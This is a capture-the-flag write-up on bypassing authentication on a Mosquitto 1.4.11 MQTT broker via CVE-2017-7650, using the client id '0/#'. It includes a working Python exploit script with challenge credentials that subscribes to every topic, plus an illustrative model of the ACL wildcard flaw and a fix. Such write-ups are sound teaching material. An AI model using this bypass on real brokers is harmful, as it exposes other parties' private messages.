The given page shows a counter of processed gifts. The source code reveals that there is a connection to an MQTT broker.
Connecting directly to the MQTT broker and subscribing to the $SYS/broker/version topic returns the following message:
mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)
So the broker is running Mosquitto 1.4.11, which contains a vulnerability that bypasses authentication when the client id contains a hash or a plus symbol. Just using plus or hash as client id failed, using ASCII characters also failed, so I thought it has to be somewhat numeric. Using 0/# as a client id works. The following Python script can be used to retrieve the flag.
```python
# Written against the paho-mqtt 1.x API (2.x additionally requires a
# callback_api_version argument to mqtt.Client).
import paho.mqtt.client as mqtt
import sys

# Client id containing a wildcard behind a numeric prefix
clientid = '0/#'


def on_connect(client, userdata, flags, rc):
    print("Connected to MQTT broker.")
    # Subscribe to all regular topics and to the broker's $SYS tree
    client.subscribe('#')
    client.subscribe('$SYS/#')


def on_message(client, userdata, msg):
    print("%s: %s" % (msg.topic, msg.payload.decode()))


client = mqtt.Client(client_id=clientid, clean_session=True, transport="websockets")
client.username_pw_set("workshop", "2fXc7AWINBXyruvKLiX")
client.on_connect = on_connect
client.on_message = on_message

print("Connecting to MQTT broker")
client.connect('whale.hacking-lab.com', 9001, 60)
client.loop_forever()
```
The flag is HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}.
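Why a client id such as 0/# gets through where a bare # or + is refused can be shown with a small model of pattern-based ACL expansion, the mechanism CVE-2017-7650 concerns. This is an added example, not code from the challenge or from Mosquitto: the ACL pattern `gifts/%c`, the topic names and the "naive" filter (assumed to reject only the bare PoC values, consistent with the behaviour described above) are hypothetical, since the page does not show the broker's configuration or patch.

```python
# Added illustration. ACL pattern, topics and the naive filter are assumptions.
ACL_PATTERN = "gifts/%c"  # hypothetical Mosquitto-style "pattern read" entry


def topic_matches(sub: str, topic: str) -> bool:
    """MQTT filter matching: '+' matches one level, '#' the remainder.
    (The special handling of $-prefixed topics is omitted here.)"""
    s, t = sub.split("/"), topic.split("/")
    for i, level in enumerate(s):
        if level == "#":
            return i == len(s) - 1  # '#' is only valid as the last level
        if i >= len(t) or (level != "+" and level != t[i]):
            return False
    return len(s) == len(t)


def expand(pattern: str, client_id: str) -> str:
    """Substitute the client id into the ACL pattern, as %c does."""
    return pattern.replace("%c", client_id)


def naive_allowed(client_id: str) -> bool:
    """Assumed incomplete fix: refuse only the exact PoC values."""
    return client_id not in ("#", "+")


def strict_allowed(client_id: str) -> bool:
    """Refuse any client id that contains a wildcard character."""
    return not any(ch in client_id for ch in "#+")


def can_read(client_id: str, topic: str, id_check) -> bool:
    """ACL decision: validate the id, then match the expanded pattern."""
    if not id_check(client_id):
        return False
    return topic_matches(expand(ACL_PATTERN, client_id), topic)


if __name__ == "__main__":
    for cid in ("elf42", "#", "+", "0/#"):
        for name, check in (("naive", naive_allowed), ("strict", strict_allowed)):
            verdict = can_read(cid, "gifts/0/flag", check)
            print(f"{name:6} client_id={cid!r:8} -> {expand(ACL_PATTERN, cid)!r:14} read gifts/0/flag: {verdict}")
```

With the naive check, the id 0/# turns the per-client pattern into the wildcard filter `gifts/0/#`; validating the whole client id for wildcard characters before substitution closes that gap.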